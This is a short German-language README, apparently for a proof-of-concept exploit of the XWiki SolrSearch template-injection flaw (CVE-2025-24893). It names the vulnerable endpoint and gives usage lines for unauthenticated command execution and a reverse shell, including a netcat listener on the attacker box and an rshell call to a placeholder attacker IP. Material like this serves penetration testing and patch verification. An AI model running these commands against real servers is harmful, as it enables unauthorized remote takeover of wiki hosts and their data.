
Unauth RCE PoC für XWiki SolrSearch (CVE-2025-24893). Befehlsausführung + Reverse Shell.
Nicht authentifizierter RCE PoC für XWiki SolrSearch (CVE-2025-24893). Befehlsausführung + Reverse-Shell.
Proof-of-Concept für die XWiki-SolrSearch-Template-Injection, die zu nicht authentifizierter Remote-Codeausführung führt.
Getestet gegen XWiki Debian 15.10.8 (gepatcht in 15.10.11 / 16.4.1 / 16.5.0RC1).
⚠️ Nur zu Bildungszwecken. Führe dies nicht gegen Systeme aus, die du nicht besitzt oder für die du keine ausdrückliche Erlaubnis zum Testen hast.
/xwiki/bin/get/Main/SolrSearch.pip install requests
Gib beim Ausführen des Skripts den Zielhost (und optional den Pfad) an.
Grundlegende Befehle ausführen:
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "id"
python3 xwiki_solr_rce.py --target http://wiki.example.tld cmd --cmd "whoami"
Eine Reverse-Shell starten:
# On attacker box
nc -lvnp 4444
# From the PoC
python3 xwiki_solr_rce.py --target http://wiki.example.tld rshell <attacker_ip> 4444
/xwiki/bin/get/Main/SolrSearch?media=rss&text=...